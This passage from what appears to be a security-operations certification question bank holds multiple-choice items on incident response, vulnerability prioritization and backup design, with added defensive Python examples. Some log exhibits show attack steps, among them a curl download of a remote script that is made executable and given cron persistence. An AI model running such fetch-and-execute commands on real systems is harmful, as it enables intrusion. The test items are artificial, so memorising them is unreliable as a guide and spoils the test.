- Last restore test: 5 months ago, failed due to permissions error

Business targets:
- RTO: 4 hours
- RPO: 30 minutes

Question 126 (hard, multiple choice)

Based on the exhibit, what is the most likely conclusion after correlating the logs?

A configuration-management task ran from a jump host and generated repeated login alerts on target servers. The SOC wants to determine whether this is malicious activity or approved automation.

Exhibit

Change window: approved 01:00-02:00

01:11:44 jump01  ssh to appsrv02 as configsvc from 10.1.10.20
01:11:47 jump01  ssh to appsrv03 as configsvc from 10.1.10.20
01:12:01 appsrv02 auth.log  2 failed password attempts for configsvc, then success with SSH key
01:12:04 appsrv03 auth.log  1 failed password attempt for configsvc, then success with SSH key
01:12:10 SIEM rule 'brute force against privileged account' triggered
CMDB / automation note: configsvc is restricted to Ansible playbooks launched only from jump01 during maintenance windows

Question 127 (hard, multiple choice)

Based on the exhibit, what is the best immediate action for the SOC or IR team?

A finance workstation shows evidence of a macro-launched script, followed by file renaming and lateral SMB traffic to two other hosts. The team has not yet determined the full scope of the incident.

Exhibit

Host: finance-lap07
10:22:11  winword.exe spawned powershell.exe -enc <redacted>
10:22:14  powershell.exe created C:\Users\ana\AppData\Roaming\rclone.exe
10:24:02  file rename activity: 184 files changed to *.locked
10:24:09  outbound SMB connections to 10.20.4.18 and 10.20.4.19
10:25:01  EDR status: endpoint still connected to corporate VPN
User report: 'My shared files stopped opening and the folder names changed.'

Question 128 (hard, multiple choice)

Based on the exhibit, what is the best eradication decision for the server compromise?

Exhibit

Linux server audit summary: APP-SRV14
10:22:13  sshd: Accepted publickey for appsvc from 10.5.14.22
10:23:01  sudo: appsvc ran /usr/bin/curl https://198.51.100.44/p.sh -o /tmp/.x
10:23:09  sudo: appsvc ran chmod +x /tmp/.x
10:23:11  /tmp/.x created /etc/cron.d/.maint
10:23:20  /etc/ssh/sshd_config modified to allow PasswordAuthentication yes
10:24:02  outbound traffic blocked by segmentation rule
IR note: host is isolated, disk image has not been taken yet, and the business wants the service restored today

Question 129 (medium, multiple choice)

A SOC analyst reviews email platform logs for a finance user account. At 08:12, the user successfully signs in from Denver. At 08:15, the same account signs in from a residential ISP in another state. At 08:16, the mailbox creates a new external forwarding rule and deletes the original alert message. The user says they did not set up forwarding. What is the best assessment?

Question 130 (medium, multiple choice)

A scan keeps reporting the same medium-severity TLS configuration issue on a public web server. The application owner says the vendor software cannot be changed until next quarter, but they can place the service behind a reverse proxy that enforces stronger cipher settings. How should the issue be handled in the vulnerability management process?

Question 131 (medium, multiple choice)

Based on the exhibit, what is the most likely explanation for the alert?

Exhibit

Network and endpoint logs for workstation WS-204

10:12:08  DNS query from WS-204 to 10.20.1.15 for wpad.corp.local
10:12:09  HTTP request from WS-204 to 10.20.1.15 for /wpad.dat
10:12:10  Proxy auto-detect enabled in browser policy
10:12:11  Traffic from WS-204 now exits through proxy 10.20.1.15

Asset inventory:
- 10.20.1.15 = CORP-PROXY01
- CORP-PROXY01 is listed as the approved outbound web proxy

Question 132 (medium, multi select)

A SIEM rule flags a Linux server because it makes outbound HTTPS connections to the same cloud IP every 15 minutes. The server runs an approved patch agent that should check in on a regular schedule. Which two checks best validate whether the alert is a false positive? Select two.

Question 133 (medium, multi select)

A legacy application server has a critical vulnerability, but the vendor will not release a fix for 30 days. Which two compensating controls are the best short-term risk reduction steps? Select two.

Question 134 (medium, multiple choice)

An IDS raises an alert for a possible SQL injection attack against an internal reporting portal. The web server logs show the source IP belongs to the company's vulnerability scanner, and the requests match the scanner's normal test pattern. What is the most appropriate analyst action?

Question 135 (easy, multiple choice)

A SIEM alert shows a workstation connecting to the same unknown internet address every 15 minutes, even after business hours. The device belongs to an employee who is on vacation. What is the best next step for the analyst?

Question 136 (medium, multi select)

A ransomware incident encrypted a file share and the attached NAS backups because the NAS stayed mounted to production and was reachable over SMB. Which two design changes would have reduced the blast radius most effectively? Select two.

Question 137 (medium, multi select)

An EDR alert shows winword.exe launching powershell.exe with an encoded command after a user opened an invoice attachment. No new executable file was written to disk, and the host is still online. Which two actions should the SOC analyst take first to validate the alert and collect usable evidence? Select two.

Question 138 (medium, multiple choice)

At 10:15, a file server begins renaming documents and creating payment notes. The SOC confirms the server is also making SMB connections to other internal hosts, but users can still access shared folders. What should the incident handler do FIRST?

Question 139 (hard, multiple choice)

Based on the exhibit, which issue should be remediated first by the operations team?

A small company has limited maintenance windows and can address only one of several findings this week.

Exhibit

Weekly vulnerability report:

1. vpn-gw01
   - Exposure: Internet-facing
   - Finding: Critical remote code execution
   - Notes: Vendor patch available; reboot required

2. db-lab02
   - Exposure: Internal only
   - Finding: High-severity authentication bypass
   - Notes: Isolated lab subnet; no sensitive data; no route to production

3. printsrv03
   - Exposure: Internet-facing administrative portal
   - Finding: Medium-severity outdated firmware
   - Notes: Vendor has not released a fix yet; temporary ACL blocks the admin port from the internet

Question 140 (medium, multiple choice)

A vulnerability dashboard shows four new findings. Which one should be remediated first by the operations team?

- A low-severity issue on an offline lab VM
- A medium-severity issue on a payroll server with no known exploit
- A critical issue on an internet-facing web server with an available exploit
- A high-severity issue on a test workstation that is not domain joined

Question 141 (hard, multiple choice)

Based on the exhibit, what is the best eradication decision after containment?

A quarantined endpoint was found to have a malicious startup item and a scheduled task. The team has already isolated it from the network and preserved memory for analysis.

Exhibit

Host: eng-lt-44
Containment status: network quarantined

Registry artifact:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = C:\Users\maria\AppData\Roaming\update.exe

Scheduled task:
TaskName: SysMaint
Action: C:\Users\maria\AppData\Roaming\update.exe /svc
Trigger: every 30 minutes

File hash:
update.exe SHA256 matches known malware family 'QuillDoor'

User impact:
- Browser pop-ups observed earlier
- No confirmed encryption
- No evidence of additional hosts compromised

Question 142 (medium, multiple choice)

Based on the exhibit, which finding is the best candidate for immediate remediation or emergency mitigation?

Exhibit

Prioritized vulnerability review

Asset             Severity   Exposure                    Notes
---------------------------------------------------------------
VPN-EDGE01        Critical   Internet-facing             Remote code execution; exploit proof-of-concept publicly available
FILE-02           High       Internal file server        SMB service outdated; only reachable from corp subnet
TEST-VM-17        High       Isolated test network       No route from production; development team owns it
PRINTER-3F        Medium     Office user VLAN            Default admin credentials; management interface reachable via HTTP

Question 143 (medium, multiple choice)

A user reports that a shared department drive is rapidly renaming files and creating ransom notes on a Windows file server. The SOC confirms suspicious activity is still occurring on that server. What should the incident responder do first?

Question 144 (hard, multiple choice)

Based on the exhibit, what is the most important next IR action?

Exhibit

Microsoft 365 audit trail for user amaya@corp.example:
09:41 User clicked link from external message and signed into a lookalike portal
09:42 OAuth consent granted to app 'ExpenseReport-Helper' scopes=Mail.Read, offline_access, User.Read
09:44 Inbox rule created: if subject contains 'invoice' then forward to finance-relay@external.example
09:46 Refresh token issued from unfamiliar IP 203.0.113.88
09:51 Admin deleted inbox rule
09:52 Password changed successfully

Question 145 (medium, multiple choice)

A SOC analyst receives an alert that a domain admin account authenticated to a file server at 02:14 from a jump host that is normally used only by the infrastructure team. The Windows logs also show a scheduled task launching a backup script at the same time, and the backup team says the task was created during yesterday's change window. What is the best next step to determine whether this is a false positive?

Question 146 (medium, multiple choice)

A branch office stores nightly backups on a NAS that is joined to the same Active Directory domain as the production servers. After a ransomware incident, management wants a backup design that is much harder for attackers to encrypt or delete. Which approach is the best improvement?

Question 147 (medium, multiple choice)

An IDS generates an alert for possible SQL injection against an internal reporting portal at 02:00. The web logs show the source IP belongs to the company's approved vulnerability scanner, the request path matches the scheduled test window, and the WAF blocked the request. What is the most appropriate analyst conclusion?

Question 148 (medium, multiple choice)

An engineering firm backs up its file server every night to a NAS that is always mounted to the production domain. After a ransomware event, management asks for the most effective improvement to reduce the chance that backups are encrypted along with production data. What should be recommended?

Question 149 (medium, multiple choice)

A monthly vulnerability scan identifies a critical vulnerability on a public-facing VPN appliance, but the vendor says no patch is available yet. The service must remain online for remote workers. What is the best compensating control to reduce risk right away?

Question 150 (easy, multiple choice)

After a phishing account compromise has been contained and the attacker’s mailbox forwarding rule was removed, what should the team do next?

Question 151 (medium, multiple choice)

A SOC analyst receives a SIEM alert for a possible brute-force attack against a remote access portal. The alert shows 240 failed logins from the same source IP over 4 minutes, followed by one successful login. Before escalating as an incident, what is the BEST evidence to check to determine whether the alert is a false positive caused by approved activity?

Question 152 (hard, multiple choice)

Based on the exhibit, which change best improves both recovery time and recovery point for the ERP database?

A mid-sized company has a two-hour RTO and a 30-minute RPO, but its current backup design cannot meet either objective during restore testing.

Exhibit

System: ERP database cluster
Business requirements:
- RTO = 2 hours
- RPO = 30 minutes
Current recovery design:
- Nightly full backup at 23:00 to onsite NAS
- Differential backup at 12:00
- Weekly copy replicated to cloud on Sundays
Restore test results:
- Cold rebuild of VM + database restore: 5 hours 40 minutes
- Data gap since last backup: 2 hours 18 minutes
- NAS is online and joined to the same domain as production servers
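
Both ERP exhibits (Question 123 and Question 152) turn on the same two calculations: the worst-case data loss a schedule allows, and whether the measured restore time fits inside the RTO. The script below is an added example for this page, not Courseiva's code. It expands a backup schedule into the recovery points available in one day, takes the longest gap between consecutive points (including the wrap past midnight) as the worst-case RPO, and compares the restore time from each exhibit against the target. The proposed design at the end (15-minute log backups plus a 45-minute failover to a standby) is an assumption introduced here to show the function with a design that passes; the exhibits do not state those numbers.

```python
"""Check a backup schedule against RTO and RPO targets.

Added example for this page, not Courseiva's code. Schedules and restore
times for the two ERP exhibits are taken from the exhibits; the 'proposed'
design at the bottom is an assumption introduced here for illustration.
"""

MIN_PER_DAY = 24 * 60


def recovery_points(schedule):
    """Expand a schedule into minute-of-day offsets for one day.

    schedule: list of (kind, spec):
      ("daily", "HH:MM")  a job that runs once a day at that time
      ("every", minutes)  a job that runs on a fixed interval from midnight
    A weekly full that shares a time with a daily job adds no extra point,
    which is why only the set of times matters, not which job produced them.
    """
    points = set()
    for kind, spec in schedule:
        if kind == "daily":
            h, m = map(int, spec.split(":"))
            points.add(h * 60 + m)
        elif kind == "every":
            points.update(range(0, MIN_PER_DAY, spec))
        else:
            raise ValueError(f"unknown schedule kind {kind!r}")
    if not points:
        raise ValueError("schedule has no daily recovery point")
    return sorted(points)


def worst_case_rpo_minutes(schedule):
    """Longest stretch between two recovery points, wrapping past midnight.

    A restore test that happens to run shortly after a backup reports a
    small gap (the 2 h 18 min in the exhibit); the design has to be judged
    on the largest gap it can produce, not the one a single test observed.
    """
    pts = recovery_points(schedule)
    gaps = [b - a for a, b in zip(pts, pts[1:])]
    gaps.append(MIN_PER_DAY - pts[-1] + pts[0])
    return max(gaps)


def evaluate(name, schedule, restore_minutes, rto_minutes, rpo_minutes):
    """Compare a design against its targets and report both results."""
    loss = worst_case_rpo_minutes(schedule)
    return {
        "system": name,
        "worst_case_data_loss_min": loss,
        "rpo_met": loss <= rpo_minutes,
        "restore_min": restore_minutes,
        "rto_met": restore_minutes <= rto_minutes,
    }


# Question 123 exhibit: weekly full and daily differential both at 01:00,
# transaction log every 30 minutes, 90-minute restore once media is on hand.
Q123 = evaluate("ERP (Q123)", [("daily", "01:00"), ("every", 30)],
                restore_minutes=90, rto_minutes=120, rpo_minutes=15)

# Question 152 exhibit: nightly full at 23:00, differential at 12:00,
# cold rebuild plus restore measured at 5 h 40 min.
Q152 = evaluate("ERP (Q152)", [("daily", "23:00"), ("daily", "12:00")],
                restore_minutes=340, rto_minutes=120, rpo_minutes=30)

# Assumed design, not from the exhibit: log backups every 15 minutes and a
# standby that can take over in 45 minutes.
PROPOSED = evaluate("ERP (assumed redesign)", [("daily", "01:00"), ("every", 15)],
                    restore_minutes=45, rto_minutes=120, rpo_minutes=15)

if __name__ == "__main__":
    for result in (Q123, Q152, PROPOSED):
        print(result)
```

Two things the numbers make obvious that the prose hides: the Question 152 design can lose up to 13 hours (the 23:00 to 12:00 stretch), far more than the 2 h 18 min the test happened to measure; and the Question 123 restore time of 90 minutes only fits the 2-hour RTO if media is already in hand, which the exhibit explicitly does not promise.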

Question 153 (easy, multiple choice)

A vulnerability scan finds a critical flaw on a public-facing server and a medium flaw on a lab system that is not connected to the production network. Which issue should be fixed first?

Question 154 (medium, multiple choice)

An EDR console reports possible beaconing from a workstation because it makes outbound HTTPS connections to the same cloud IP every 15 minutes. The workstation belongs to the patch-management team, and the destination resolves to a vendor update service. Which evidence best supports closing the alert as a false positive?

Question 155 (easy, multiple choice)

A technician restores a file server from backup, but the business wants confidence that the recovery process will work during an outage. What should the team do most often to validate the backups?

Question 156 (hard, multiple choice)

Based on the exhibit, what is the best-supported conclusion for the SOC analyst?

Exhibit

DNS telemetry for host LAP-09:
10:14:02  query=TXT  name=k7f3a9d1a.reporting-updates.net  client=10.1.8.44
10:15:02  query=TXT  name=m2b8c4.reporting-updates.net       client=10.1.8.44
10:16:02  query=TXT  name=q9z1x7.reporting-updates.net       client=10.1.8.44
10:17:02  query=TXT  name=t4n8p2.reporting-updates.net       client=10.1.8.44
Packet summary: 58-byte UDP responses, repeated every 60 seconds
Proxy logs: no HTTP or HTTPS sessions to reporting-updates.net
EDR: python.exe launched by signed pdf reader, process exited in 3 seconds
EDR network telemetry: same pattern continued after the document closed
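
The LAP-09 exhibit is a textbook DNS-tunnelling pattern: TXT queries, a fresh pseudo-random label on every query, a fixed 60-second cadence, no web session to the domain, and activity that outlived the document that started it. The script below is an added example for this page, not Courseiva's code. It parses the four log lines exactly as printed in the exhibit, computes the per-query features (query type, label uniqueness, label entropy, interval), and folds in the proxy and EDR observations as inputs. The scoring weights are assumptions chosen for this illustration, not a published detection rule.

```python
"""Score DNS telemetry for a tunnelling / C2 channel over TXT records.

Added example for this page, not Courseiva's code. The query lines are those
from the LAP-09 exhibit; the proxy and EDR findings are passed in as flags.
The weights in score_domain() are assumptions for illustration.
"""
import math
import re
from collections import Counter
from datetime import datetime

# Copied from the exhibit
DNS_LOG = """\
10:14:02  query=TXT  name=k7f3a9d1a.reporting-updates.net  client=10.1.8.44
10:15:02  query=TXT  name=m2b8c4.reporting-updates.net       client=10.1.8.44
10:16:02  query=TXT  name=q9z1x7.reporting-updates.net       client=10.1.8.44
10:17:02  query=TXT  name=t4n8p2.reporting-updates.net       client=10.1.8.44
"""
LINE = re.compile(r"(\d\d:\d\d:\d\d)\s+query=(\w+)\s+name=(\S+)\s+client=(\S+)")


def parse(log):
    """Turn the exhibit's text lines into records."""
    out = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            t, qtype, name, client = m.groups()
            out.append({"t": datetime.strptime(t, "%H:%M:%S"),
                        "qtype": qtype, "name": name, "client": client})
    return out


def shannon_entropy(s):
    """Bits per character; random-looking labels score higher than words."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name):
    # Last two labels is enough for this example; real code should use a public-suffix list.
    return ".".join(name.rstrip(".").split(".")[-2:])


def score_domain(records, domain, web_sessions_seen, launched_by_signed_parent, persisted_after_parent_exit):
    """Collect tunnelling signals for one domain and return them with a score."""
    recs = [r for r in records if registered_domain(r["name"]) == domain]
    labels = [r["name"].split(".")[0] for r in recs]
    stamps = sorted(r["t"] for r in recs)
    gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
    signals = {
        "queries": len(recs),
        "unique_subdomains": len(set(labels)),
        "txt_share": sum(r["qtype"] == "TXT" for r in recs) / len(recs),
        "mean_label_entropy": sum(shannon_entropy(l) for l in labels) / len(labels),
        "fixed_interval_s": gaps[0] if gaps and max(gaps) - min(gaps) <= 2 else None,
        "web_sessions_to_domain": web_sessions_seen,
        # Recorded, not scored: a signed launcher says nothing about what it spawned.
        "launched_by_signed_parent": launched_by_signed_parent,
        "activity_outlived_document": persisted_after_parent_exit,
    }
    score = 0
    if signals["txt_share"] >= 0.9:
        score += 2   # TXT answers carry arbitrary data back to the client
    if signals["unique_subdomains"] == signals["queries"] and signals["queries"] >= 3:
        score += 2   # every query a new label: the request itself carries the payload
    if signals["mean_label_entropy"] >= 2.5:
        score += 1
    if signals["fixed_interval_s"] is not None:
        score += 2   # metronomic cadence is a check-in loop, not a user
    if not web_sessions_seen:
        score += 1   # a 'reporting-updates' host that is never visited over HTTP(S)
    if persisted_after_parent_exit:
        score += 2   # survived the document closing: something else is keeping it alive
    signals["score"] = score
    signals["verdict"] = "probable DNS tunnelling / C2 channel" if score >= 7 else "inconclusive"
    return signals


if __name__ == "__main__":
    result = score_domain(parse(DNS_LOG), "reporting-updates.net",
                          web_sessions_seen=False, launched_by_signed_parent=True,
                          persisted_after_parent_exit=True)
    print(result)
```

Note what is not in the score: the 58-byte responses and the signed PDF reader. Small responses are consistent with either a tunnel or a legitimate TXT lookup, and a signed parent process is exactly what a document-borne loader relies on, so neither moves the needle on its own.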
Question 157 (medium, multiple choice)

A file server in the accounting department begins renaming documents and dropping ransom notes. The SOC confirms encryption is still in progress, and the server hosts a share used by several finance teams. What should the incident response team do first?

Question 158 (medium, multiple choice)

An EDR alert flags suspicious PowerShell on a finance workstation. Windows logs show the script started immediately after a patch-management tool launched from the software distribution server. The script only queries installed software and writes results to a log file. What is the most likely conclusion?

Question 159 (easy, multiple choice)

A company wants to make sure it can recover quickly after ransomware, even if the production network is unavailable. Which backup approach is the best choice?

Question 160 (easy, multiple choice)

A SOC analyst sees 20 failed logins for one user account, followed by a successful login 30 seconds later from the same office subnet. The user confirms they mistyped the password several times. What is the best conclusion?

Question 161 (medium, multiple choice)

A SOC analyst confirms that an employee entered credentials into a phishing site and that the mailbox now shows a new forwarding rule sending messages to an external address. The account is still signed in on a laptop and a mobile phone. What is the best next action?

Question 162 (easy, multiple choice)

A legacy application cannot be patched for two weeks, but the security team still wants to reduce risk in the meantime. What is the best temporary measure?

Question 163 (medium, multiple choice)

A weekly scan reports three findings: a medium-severity missing patch on a lab VM with no network access, a high-severity default credential on a management interface reachable from the internet, and a low-severity outdated browser plug-in on a visitor kiosk. Which issue should be remediated first?

Question 164 (medium, multiple choice)

Based on the exhibit, which action should the incident response team take next to eradicate the threat?

Exhibit

EDR timeline - WS-224
11:07  User opened invoice.docm
11:08  winword.exe spawned powershell.exe -enc <redacted>
11:09  PowerShell created C:\ProgramData\updater.vbs
11:10  Scheduled task 'UpdaterSvc' created to run at logon
11:12  Outbound connection blocked to 203.0.113.77:8443
11:14  Host isolated from the network
11:16  Memory capture completed

Analyst note:
  The workstation was used for finance approvals during the last hour.
  No other hosts have shown the same indicators yet.
Question 165 (hard, multiple choice)

Based on the exhibit, which change best improves recovery resilience against a repeat ransomware incident?

Exhibit

Current backup design:
- Production file server backs up nightly at 23:00 to NAS-Backup over SMB.
- NAS-Backup is mounted read/write to the file server 24x7.
- Weekly copy job replicates NAS contents to cloud object storage.
- Backup credentials are shared with the server admin group.
- Last restore test: 14 months ago.
Incident summary:
- Ransomware encrypted production files and then encrypted the NAS share using the same credentials.
Question 166 (medium, multiple choice)

A monthly scan finds a critical remote-code-execution issue on an internet-facing VPN appliance. The vendor has released a fix, but the appliance can only be rebooted during the weekend maintenance window in five days. What is the BEST immediate action to lower risk until patching can occur?

Question 167 (medium, multiple choice)

A Linux host is patched, but the scanner still flags the package as vulnerable. The vendor advisory says the distribution backported the fix, so the package version did not change. What should the analyst do before closing the ticket?
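
An added example (not from the page) of the check behind this question: a version-only scanner compares the installed version with the upstream fix version and flags the host, while the distribution's changelog shows the fix was backported into the same version at a higher release. The changelog text is constructed in the style of `rpm -q --changelog` output; the package versions and maintainer string are made up, and the CVE identifier uses the year 2099 as a deliberate placeholder that cannot be a real assignment.

```python
import re

# Placeholder identifier for this example only; 2099 cannot be a real CVE year.
CVE_ID = "CVE-2099-00001"

# Constructed text in the style of `rpm -q --changelog <pkg>`; not real output.
CHANGELOG = """\
* Tue Mar 05 2024 Distro Maintainer <maint@example.org> - 1:3.0.7-27
- Backport upstream fix for CVE-2099-00001 (out-of-bounds read in record parser)

* Mon Jan 15 2024 Distro Maintainer <maint@example.org> - 1:3.0.7-26
- Rebuild against updated toolchain
"""

# Entry header: "* <day> <mon> <dd> <yyyy> <packager> - <epoch:version-release>"
ENTRY_RE = re.compile(r"^\* (?P<date>\w{3} \w{3} \d{2} \d{4}) .*? - (?P<release>\S+)$", re.M)


def parse_changelog(text):
    """Split changelog text into entries of (date, release, body), newest first."""
    entries = []
    heads = list(ENTRY_RE.finditer(text))
    for i, h in enumerate(heads):
        end = heads[i + 1].start() if i + 1 < len(heads) else len(text)
        entries.append({"date": h.group("date"), "release": h.group("release"),
                        "body": text[h.end():end].strip()})
    return entries


def backport_status(text, cve):
    """Oldest release whose entry mentions the CVE; that is where the backport landed."""
    for e in reversed(parse_changelog(text)):
        if re.search(re.escape(cve) + r"\b", e["body"], re.I):
            return {"fixed": True, "release": e["release"], "date": e["date"]}
    return {"fixed": False, "release": None, "date": None}


def version_tuple(v):
    """'1:3.0.7-27' -> (3, 0, 7): drop the epoch and the distro release suffix."""
    return tuple(int(x) for x in re.sub(r"^\d+:", "", v).split("-")[0].split("."))


def version_looks_vulnerable(installed, upstream_fixed_in):
    """What a version-only scanner does: anything below the upstream fix version is flagged."""
    return version_tuple(installed) < version_tuple(upstream_fixed_in)


if __name__ == "__main__":
    print("scanner view :", version_looks_vulnerable("1:3.0.7-27", "3.0.9"))
    print("changelog view:", backport_status(CHANGELOG, CVE_ID))
```

On RPM systems the real check is `rpm -q --changelog <pkg> | grep -i <CVE>`; Debian and Ubuntu expose the same information through `apt changelog <pkg>` (or `/usr/share/doc/<pkg>/changelog.Debian.gz`). Attach the matching changelog entry to the ticket as the evidence, and fix the root cause by pointing the scanner at the distribution's security feed (OVAL or advisory data) so backported releases are recognised, rather than closing findings by hand each month.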

Question 168 (medium, multiple choice)

A file server is actively renaming documents and generating ransom notes. The server hosts a shared drive used by finance, and users are still online. What is the best immediate action?

Question 169 (medium, multi select)

A SIEM alert shows a workstation making repeated outbound HTTPS connections every 15 minutes to the same cloud IP address. The host belongs to the patch-management group, and the security team suspects an approved agent may be responsible. Which two checks best validate whether this is a false positive? Select two.

Question 170 (medium, multiple choice)

A branch office uses a NAS for nightly backups, but the NAS is joined to the same domain as the production servers. After ransomware encrypted both production data and backups, management wants the most effective change to reduce the chance of backup tampering without a major redesign. Which control should be implemented?

Question 171 (medium, multiple choice)

After containment and eradication of malware on several laptops, the team restores the devices from known-good images and verifies that users can authenticate and access email. Which action should occur NEXT to complete the incident response lifecycle and reduce future impact?

Question 172 (medium, multi select)

A SOC analyst confirms that a user entered corporate credentials into a fake sign-in page. Mailbox logs now show a new forwarding rule sending messages to an external address, and the attacker may still have an active session. Which two actions should the analyst take first to contain the account compromise? Select two.

Question 173 (medium, multiple choice)

A critical vulnerability is discovered on an internet-facing VPN appliance that cannot be patched for six weeks because the vendor has not released a fix. The VPN service must remain available. What is the best operational response?

Question 174 (medium, multiple choice)

A systems administrator says the backup software reports success every night, but no one has restored a server from backup in over a year. The business wants confidence that a file server can be recovered within the agreed recovery window. What is the best next action?

Question 175 (easy, multiple choice)

A user reports that their laptop is suddenly encrypting files and showing a ransom note. What should the incident response team do first?

Question 176 (medium, multiple choice)

Based on the exhibit, what should the team do next after the account has been contained?

Exhibit

Email security investigation for user amiller

- User submitted credentials on a fake sign-in page at 08:22
- Password was reset at 08:35
- Active sessions were revoked at 08:36
- Mailbox audit now shows:
  * Inbox rule: 'FinanceDocs' forwards any message with 'invoice' to external address redacted@proton.example
  * OAuth consent granted to unknown application 'QuickDocs Sync'
  * Deleted Items folder contains no suspicious messages

Help desk confirms the user still has access to the mailbox after reset.
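
An added example, not part of the question bank: after the password reset and session revocation recorded in the exhibit, two artifacts still give the attacker a path to the mailbox, and a triage script can list them straight from the mailbox audit. The audit records, the example.com organisation domain and the approved-application allowlist are constructed; the field names are this example's own and not a specific vendor's API. The same check covers the forwarding-rule scenarios in Questions 161, 172 and 227.

```python
ORG_DOMAINS = {"example.com"}                 # assumed: the organisation's own mail domains
APPROVED_APPS = {"Corporate Mail Client"}     # assumed: tenant allowlist of consented apps

# Constructed mailbox audit records modelled on the amiller exhibit; not real logs.
AUDIT_RECORDS = [
    {"type": "InboxRule", "name": "FinanceDocs", "condition": "subject contains 'invoice'",
     "forward_to": "redacted@proton.example", "created": "08:24"},
    {"type": "InboxRule", "name": "Move newsletters", "condition": "from newsletters@example.com",
     "forward_to": None, "created": "2023-05-02"},
    {"type": "OAuthConsent", "app": "QuickDocs Sync",
     "scopes": ["Mail.Read", "Mail.ReadWrite", "offline_access"], "created": "08:25"},
    {"type": "OAuthConsent", "app": "Corporate Mail Client",
     "scopes": ["Mail.Read"], "created": "2022-06-01"},
]
CONTAINMENT_DONE = {"password_reset", "sessions_revoked"}   # what the exhibit records as done


def is_external(address, org_domains=ORG_DOMAINS):
    return address.rsplit("@", 1)[-1].lower() not in {d.lower() for d in org_domains}


def residual_access(records, org_domains=ORG_DOMAINS, approved_apps=APPROVED_APPS):
    """Artifacts that keep mail flowing to the attacker after reset and revocation."""
    findings = []
    for r in records:
        if r["type"] == "InboxRule" and r.get("forward_to") and is_external(r["forward_to"], org_domains):
            findings.append({
                "artifact": f"inbox rule '{r['name']}'",
                "why": f"forwards matching mail to external address {r['forward_to']}",
                "action": "delete the rule; review what was already forwarded for data exposure",
            })
        elif r["type"] == "OAuthConsent" and r["app"] not in approved_apps:
            # offline_access means the app was issued refresh tokens: revoke them explicitly.
            note = " (offline_access granted: revoke refresh tokens too)" if "offline_access" in r["scopes"] else ""
            findings.append({
                "artifact": f"OAuth application '{r['app']}'",
                "why": f"unapproved app consented with scopes {sorted(r['scopes'])}",
                "action": "revoke the consent and the application's tokens" + note,
            })
    return findings


def contained(records, done=CONTAINMENT_DONE):
    """Reset and revocation are necessary, but not sufficient while any artifact remains."""
    return {"password_reset", "sessions_revoked"} <= done and not residual_access(records)


if __name__ == "__main__":
    for f in residual_access(AUDIT_RECORDS):
        print(f)
    print("contained:", contained(AUDIT_RECORDS))
```

The help-desk note that the user "still has access" after the reset is expected and not evidence of containment; the question is whether the attacker's rule and the consented application still have it.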
Question 177 (medium, multi select)

Management wants to ensure a file server backed up every night can actually be restored within a 4-hour recovery time objective after an incident. Which two actions best improve recovery confidence? Select two.

Question 178 (easy, multi select)

A Linux administrator must run a weekly maintenance script on 40 servers without giving technicians interactive root access. Which two practices best support secure administration? Select two.

Question 179 (medium, multiple choice)

After a suspicious laptop is imaged with a write blocker, the original drive is sealed and stored. Before a second analyst examines the image, what is the most important next step to preserve admissibility?

Question 180 (medium, multiple choice)

A server room is located next to a chilled-water pipe, and facilities staff want the earliest possible warning if moisture starts leaking under the raised floor. Which control is the best fit?

Question 181 (hard, multi select)

An email security team receives a macro-enabled spreadsheet from a known supplier. The file must be analyzed before users open it, and if it proves malicious, the organization wants to stop the same attachment from reaching other inboxes. Which two tools are the best fit? Select two.

Question 182 (hard, matching)

Match each incident response activity to the phase of the incident response lifecycle it best represents. Use each option once.

1. A SOC analyst disables a compromised account, isolates the workstation from the network, and preserves volatile evidence.
2. The team images the infected system, removes the malicious persistence mechanism, and patches the exploited vulnerability.
3. After restoring services, the team reviews timeline gaps, detection delays, and control failures with management.
4. Before the attack occurs, the team verifies contact lists, playbooks, escalation paths, and backup credentials.
5. The team confirms suspicious authentication logs, endpoint alerts, and unusual outbound traffic indicate an active compromise.

Options:
- Containment
- Eradication
- Lessons learned
- Preparation
- Identification

Question 183 (hard, multi select)

A finance workstation begins encrypting local files, and the EDR console shows the process is also enumerating SMB shares on adjacent hosts. The user reports no suspicious email and is still logged in. Management wants the fastest containment step that minimizes spread and the best follow-up action to preserve useful evidence. Which two actions should the SOC take first? Select two.

Question 184 (medium, multiple choice)

A SIEM analyst reviews authentication logs and sees the following pattern over 15 minutes: 68 different user accounts each had one failed login attempt from the same source IP, followed by no lockouts, and then one of the accounts successfully authenticated from that same IP using a valid password. What is the most likely explanation?

Question 185 (medium, multiple choice)

After a ransomware incident, management learns the attacker's stolen domain admin credentials were used to delete recent online backups from the same backup network. Which backup strategy would have most reduced the chance of permanent backup loss?

Question 186 (medium, multiple choice)

The email security team receives a suspicious invoice attachment from a vendor. The attachment is not blocked by signature-based detection, but the team wants to observe its behavior in a safe environment before delivery to users. What tool best fits this requirement?

Question 187 (medium, multiple choice)

A nightly patch script restarts services on 40 Linux servers. Security does not want an administrator to log in interactively, and the script should only have the permissions needed to install approved patches and restart those services. What is the best design?

Question 188 (easy, multiple choice)

Based on the exhibit, which control should be installed or expanded to provide the earliest warning of this hazard?

Exhibit

Data Room Environmental Sensor Log
10:15  Humidity: 82%
10:16  Leak Sensor Under Rack 7: Dry
10:17  Leak Sensor Under Rack 7: Wet
10:18  Water Detected Under Raised Floor
Facilities Note: 'Condensation forms on the chilled-water pipe during humid afternoons.'
Question 189 (medium, multiple choice)

An investigator must collect data from a suspected insider-threat laptop so the evidence could be used in an HR and legal review. Which action best preserves admissibility?

Question 190 (medium, multiple choice)

A SIEM alert shows 300 failed logins against the same VPN account from one source IP over 12 minutes, followed by a successful login from that same IP and a spike in mailbox access. The user says they did not initiate the session. What is the most likely cause?

Question 191 (easy, multiple choice)

Based on the exhibit, which change best improves secure administration for the scheduled task?

Exhibit

Windows Task Scheduler Settings
Task Name: DailyLogArchive
Run As: Administrator
Trigger: Daily at 01:00
Action: powershell.exe -File C:\Scripts\Archive.ps1
Security Options: 'Run only when user is logged on' = Enabled
Note: The script only copies logs to a shared archive location.
Question 192 (medium, multiple choice)

A SIEM correlates VPN authentication logs and sees 14 different user accounts receive one failed login attempt each from the same source IP during a 5-minute window. A few minutes later, one of those accounts successfully authenticates from that same IP. Which attack is most likely?

Question 193 (hard, multi select)

A security team receives a macro-enabled spreadsheet from a supplier. The file must be analyzed before any user opens it, and if the same payload later executes on an endpoint the organization wants the ability to contain it automatically. Which two tools best fit those requirements? Select two.

Question 194 (easy, multi select)

